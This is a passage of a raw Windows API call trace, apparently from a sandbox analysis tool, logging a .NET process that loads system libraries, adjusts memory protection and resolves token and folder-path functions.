pbstr=0x6ec93c*="shell32.dll") returned 1 [0080.567] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0080.567] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0080.567] GetLastError () returned 0x7e [0080.567] SetLastError (dwErrCode=0x7e) [0080.571] SysReAllocStringLen (in: pbstr=0x6ec93c*=0x0, psz="shell32.dll", len=0xb | out: pbstr=0x6ec93c*="shell32.dll") returned 1 [0080.571] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0080.571] LoadLibraryExW (lpLibFileName="shell32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0080.571] GetLastError () returned 0x0 [0080.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d13b4, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x4, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d1000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x20) returned 0x0 [0080.572] GetCurrentProcess () returned 0xffffffff [0080.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d13b4, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x20, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d1000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x4) returned 0x0 [0080.572] GetCurrentProcess () returned 0xffffffff [0080.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d13c4, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x4, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d1000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x20) returned 0x0 [0080.572] GetCurrentProcess () returned 0xffffffff [0080.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d13c4, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x20, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d1000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x4) returned 0x0 [0080.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d21c0, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x4, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d2000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x20) returned 0x0 [0080.573] GetCurrentProcess () returned 0xffffffff [0080.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d21c0, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x20, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d2000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x4) returned 0x0 [0080.573] GetCurrentProcess () returned 0xffffffff [0080.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d224c, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x4, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d2000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x20) returned 0x0 [0080.573] GetCurrentProcess () returned 0xffffffff [0080.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec924*=0x759d224c, NumberOfBytesToProtect=0x6ec928, NewAccessProtection=0x20, OldAccessProtection=0x6ec95c | out: BaseAddress=0x6ec924*=0x759d2000, NumberOfBytesToProtect=0x6ec928, OldAccessProtection=0x6ec95c*=0x4) returned 0x0 [0080.574] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPath") returned 0x0 [0080.574] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0080.574] SysReAllocStringLen (in: pbstr=0x6ec958*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x6ec958*="ole32.dll") returned 1 [0080.574] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0080.574] LoadLibraryExW (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0080.574] GetLastError () returned 0x0 [0080.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766214a0, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x4, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x20) returned 0x0 [0080.575] GetCurrentProcess () returned 0xffffffff [0080.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766214a0, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x20, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x4) returned 0x0 [0080.575] GetCurrentProcess () returned 0xffffffff [0080.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766214b0, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x4, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x20) returned 0x0 [0080.575] GetCurrentProcess () returned 0xffffffff [0080.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766214b0, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x20, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x4) returned 0x0 [0080.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766219a8, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x4, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x20) returned 0x0 [0080.576] GetCurrentProcess () returned 0xffffffff [0080.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766219a8, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x20, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x4) returned 0x0 [0080.576] GetCurrentProcess () returned 0xffffffff [0080.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766219ac, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x4, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x20) returned 0x0 [0080.576] GetCurrentProcess () returned 0xffffffff [0080.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x766219ac, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x20, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x4) returned 0x0 [0080.576] GetCurrentProcess () returned 0xffffffff [0080.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x76621a00, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x4, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x20) returned 0x0 [0080.576] GetCurrentProcess () returned 0xffffffff [0080.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec940*=0x76621a00, NumberOfBytesToProtect=0x6ec944, NewAccessProtection=0x20, OldAccessProtection=0x6ec978 | out: BaseAddress=0x6ec940*=0x76621000, NumberOfBytesToProtect=0x6ec944, OldAccessProtection=0x6ec978*=0x4) returned 0x0 [0080.577] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0080.577] CoTaskMemAlloc (cb=0x20c) returned 0xb605b0 [0080.577] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb605b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0080.579] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0080.579] CoTaskMemFree (pv=0xb605b0) [0080.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ecff8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0080.590] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEvent") returned 0x0 [0080.592] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0080.593] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x25c [0080.594] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0080.597] CoGetObjectContext (in: riid=0x34e26c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ed540 | out: ppv=0x6ed540*=0xb51e34) returned 0x0 [0080.601] GetCurrentThreadId () returned 0xb0c [0080.601] ResetEvent (hEvent=0xb8) returned 1 [0080.601] GetCurrentThreadId () returned 0xb0c [0080.602] GetCurrentThreadId () returned 0xb0c [0080.602] GetCurrentThreadId () returned 0xb0c [0080.602] GetCurrentThreadId () returned 0xb0c [0080.602] ResetEvent (hEvent=0xb8) returned 1 [0080.602] GetCurrentThreadId () returned 0xb0c [0080.602] GetCurrentThreadId () returned 0xb0c [0080.602] SetEvent (hEvent=0xbc) returned 1 [0080.602] SetEvent (hEvent=0xb8) returned 1 [0080.602] CloseHandle (hObject=0x270) returned 1 [0080.602] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=40, lpWideCharStr=0x6ebfe0, cchWideChar=2047 | out: lpWideCharStr="API-MS-Win-Security-LSALookup-L1-1-0.dll") returned 40 [0080.603] SysReAllocStringLen (in: pbstr=0x6ecfe4*=0x0, psz="API-MS-Win-Security-LSALookup-L1-1-0.dll", len=0x28 | out: pbstr=0x6ecfe4*="API-MS-Win-Security-LSALookup-L1-1-0.dll") returned 1 [0080.603] CharLowerBuffW (in: lpsz="API-MS-Win-Security-LSALookup-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-security-lsalookup-l1-1-0.dll") returned 0x28 [0080.603] LoadLibraryExA (lpLibFileName="API-MS-Win-Security-LSALookup-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0080.603] GetLastError () returned 0x0 [0080.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecfd0*=0x76d11074, NumberOfBytesToProtect=0x6ecfd4, NewAccessProtection=0x4, OldAccessProtection=0x6ed008 | out: BaseAddress=0x6ecfd0*=0x76d11000, NumberOfBytesToProtect=0x6ecfd4, OldAccessProtection=0x6ed008*=0x20) returned 0x0 [0080.603] GetCurrentProcess () returned 0xffffffff [0080.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecfd0*=0x76d11074, NumberOfBytesToProtect=0x6ecfd4, NewAccessProtection=0x20, OldAccessProtection=0x6ed008 | out: BaseAddress=0x6ecfd0*=0x76d11000, NumberOfBytesToProtect=0x6ecfd4, OldAccessProtection=0x6ed008*=0x4) returned 0x0 [0080.604] GetCurrentProcess () returned 0xffffffff [0080.604] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecfd0*=0x76d11088, NumberOfBytesToProtect=0x6ecfd4, NewAccessProtection=0x4, OldAccessProtection=0x6ed008 | out: BaseAddress=0x6ecfd0*=0x76d11000, NumberOfBytesToProtect=0x6ecfd4, OldAccessProtection=0x6ed008*=0x20) returned 0x0 [0080.604] GetCurrentProcess () returned 0xffffffff [0080.604] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecfd0*=0x76d11088, NumberOfBytesToProtect=0x6ecfd4, NewAccessProtection=0x20, OldAccessProtection=0x6ed008 | out: BaseAddress=0x6ecfd0*=0x76d11000, NumberOfBytesToProtect=0x6ecfd4, OldAccessProtection=0x6ed008*=0x4) returned 0x0 [0080.604] GetProcAddress (hModule=0x76d10000, lpProcName="LookupAccountSidLocalW") returned 0x76d205da [0080.605] GetCurrentThreadId () returned 0xb0c [0080.605] ResetEvent (hEvent=0xb8) returned 1 [0080.605] GetCurrentThreadId () returned 0xb0c [0080.605] GetCurrentThreadId () returned 0xb0c [0080.605] GetCurrentThreadId () returned 0xb0c [0080.605] GetCurrentThreadId () returned 0xb0c [0080.605] ResetEvent (hEvent=0xb8) returned 1 [0080.605] GetCurrentThreadId () returned 0xb0c [0080.605] GetCurrentThreadId () returned 0xb0c [0080.605] SetEvent (hEvent=0xbc) returned 1 [0080.605] SetEvent (hEvent=0xb8) returned 1 [0080.605] CloseHandle (hObject=0x274) returned 1 [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] ResetEvent (hEvent=0xb8) returned 1 [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] ResetEvent (hEvent=0xb8) returned 1 [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] SetEvent (hEvent=0xbc) returned 1 [0080.606] SetEvent (hEvent=0xb8) returned 1 [0080.606] CloseHandle (hObject=0x270) returned 1 [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] ResetEvent (hEvent=0xb8) returned 1 [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] ResetEvent (hEvent=0xb8) returned 1 [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] GetCurrentThreadId () returned 0xb0c [0080.606] SetEvent (hEvent=0xbc) returned 1 [0080.606] SetEvent (hEvent=0xb8) returned 1 [0080.606] CloseHandle (hObject=0x274) returned 1 [0081.049] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=12, lpWideCharStr=0x6ebc10, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll譐¶d") returned 12 [0081.049] SysReAllocStringLen (in: pbstr=0x6ecc14*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x6ecc14*="ADVAPI32.dll") returned 1 [0081.049] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0081.050] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0081.050] GetLastError () returned 0x0 [0081.050] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711520, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.051] GetCurrentProcess () returned 0xffffffff [0081.051] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711520, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.051] GetCurrentProcess () returned 0xffffffff [0081.051] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711540, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.051] GetCurrentProcess () returned 0xffffffff [0081.051] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711540, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.051] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x7771175c, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.052] GetCurrentProcess () returned 0xffffffff [0081.052] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x7771175c, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.052] GetCurrentProcess () returned 0xffffffff [0081.052] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711768, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.052] GetCurrentProcess () returned 0xffffffff [0081.052] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711768, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.053] GetCurrentProcess () returned 0xffffffff [0081.053] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117b8, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.053] GetCurrentProcess () returned 0xffffffff [0081.053] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117b8, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.053] GetCurrentProcess () returned 0xffffffff [0081.053] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117bc, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.054] GetCurrentProcess () returned 0xffffffff [0081.054] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117bc, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.054] GetCurrentProcess () returned 0xffffffff [0081.054] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117c8, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.054] GetCurrentProcess () returned 0xffffffff [0081.054] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117c8, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.054] GetCurrentProcess () returned 0xffffffff [0081.054] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117d0, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.055] GetCurrentProcess () returned 0xffffffff [0081.055] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x777117d0, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.055] GetCurrentProcess () returned 0xffffffff [0081.055] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x7771180c, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.055] GetCurrentProcess () returned 0xffffffff [0081.055] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x7771180c, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.056] GetCurrentProcess () returned 0xffffffff [0081.056] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x7771182c, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.056] GetCurrentProcess () returned 0xffffffff [0081.056] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x7771182c, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.056] GetCurrentProcess () returned 0xffffffff [0081.056] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711860, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x4, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x20) returned 0x0 [0081.057] GetCurrentProcess () returned 0xffffffff [0081.057] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecc00*=0x77711860, NumberOfBytesToProtect=0x6ecc04, NewAccessProtection=0x20, OldAccessProtection=0x6ecc38 | out: BaseAddress=0x6ecc00*=0x77711000, NumberOfBytesToProtect=0x6ecc04, OldAccessProtection=0x6ecc38*=0x4) returned 0x0 [0081.057] GetProcAddress (hModule=0x77710000, lpProcName="OpenThreadToken") returned 0x7772432c [0081.057] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0081.058] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0081.058] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0081.058] GetProcAddress (hModule=0x77710000, lpProcName="EqualSid") returned 0x7772410b [0081.059] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0081.059] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=13, lpWideCharStr=0x6ebf04, cchWideChar=2047 | out: lpWideCharStr="CRYPTBASE.dll") returned 13 [0081.059] SysReAllocStringLen (in: pbstr=0x6ecf08*=0x0, psz="CRYPTBASE.dll", len=0xd | out: pbstr=0x6ecf08*="CRYPTBASE.dll") returned 1 [0081.059] CharLowerBuffW (in: lpsz="CRYPTBASE.dll", cchLength=0xd | out: lpsz="cryptbase.dll") returned 0xd [0081.059] LoadLibraryExA (lpLibFileName="CRYPTBASE.dll", hFile=0x0, dwFlags=0x0) returned 0x75790000 [0081.059] GetLastError () returned 0x0 [0081.060] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecef4*=0x7579109c, NumberOfBytesToProtect=0x6ecef8, NewAccessProtection=0x4, OldAccessProtection=0x6ecf2c | out: BaseAddress=0x6ecef4*=0x75791000, NumberOfBytesToProtect=0x6ecef8, OldAccessProtection=0x6ecf2c*=0x20) returned 0x0 [0081.060] GetCurrentProcess () returned 0xffffffff [0081.060] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecef4*=0x7579109c, NumberOfBytesToProtect=0x6ecef8, NewAccessProtection=0x20, OldAccessProtection=0x6ecf2c | out: BaseAddress=0x6ecef4*=0x75791000, NumberOfBytesToProtect=0x6ecef8, OldAccessProtection=0x6ecf2c*=0x4) returned 0x0 [0081.060] GetCurrentProcess () returned 0xffffffff [0081.060] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecef4*=0x757910a4, NumberOfBytesToProtect=0x6ecef8, NewAccessProtection=0x4, OldAccessProtection=0x6ecf2c | out: BaseAddress=0x6ecef4*=0x75791000, NumberOfBytesToProtect=0x6ecef8, OldAccessProtection=0x6ecf2c*=0x20) returned 0x0 [0081.060] GetCurrentProcess () returned 0xffffffff [0081.061] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecef4*=0x757910a4, NumberOfBytesToProtect=0x6ecef8, NewAccessProtection=0x20, OldAccessProtection=0x6ecf2c | out: BaseAddress=0x6ecef4*=0x75791000, NumberOfBytesToProtect=0x6ecef8, OldAccessProtection=0x6ecf2c*=0x4) returned 0x0 [0081.061] GetProcAddress (hModule=0x75790000, lpProcName="SystemFunction036") returned 0x757912f0 [0081.062] GetCurrentThreadId () returned 0xb0c [0081.062] ResetEvent (hEvent=0xb8) returned 1 [0081.062] GetCurrentThreadId () returned 0xb0c [0081.062] GetCurrentThreadId () returned 0xb0c [0081.062] GetCurrentThreadId () returned 0xb0c [0081.062] GetCurrentThreadId () returned 0xb0c [0081.062] ResetEvent (hEvent=0xb8) returned 1 [0081.062] GetCurrentThreadId () returned 0xb0c [0081.062] GetCurrentThreadId () returned 0xb0c [0081.062] SetEvent (hEvent=0xbc) returned 1 [0081.062] SetEvent (hEvent=0xb8) returned 1 [0081.062] CloseHandle (hObject=0x278) returned 1 [0081.285] GetCurrentThreadId () returned 0xb0c [0081.285] ResetEvent (hEvent=0xb8) returned 1 [0081.285] GetCurrentThreadId () returned 0xb0c [0081.285] GetCurrentThreadId () returned 0xb0c [0081.285] GetCurrentThreadId () returned 0xb0c [0081.285] GetCurrentThreadId () returned 0xb0c [0081.285] ResetEvent (hEvent=0xb8) returned 1 [0081.285] GetCurrentThreadId () returned 0xb0c [0081.285] GetCurrentThreadId () returned 0xb0c [0081.285] SetEvent (hEvent=0xbc) returned 1 [0081.285] SetEvent (hEvent=0xb8) returned 1 [0081.286] CloseHandle (hObject=0x28c) returned 1 [0081.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x6ec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0081.294] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibrary") returned 0x0 [0081.299] GetProcAddress (hModule=0x76d30000, 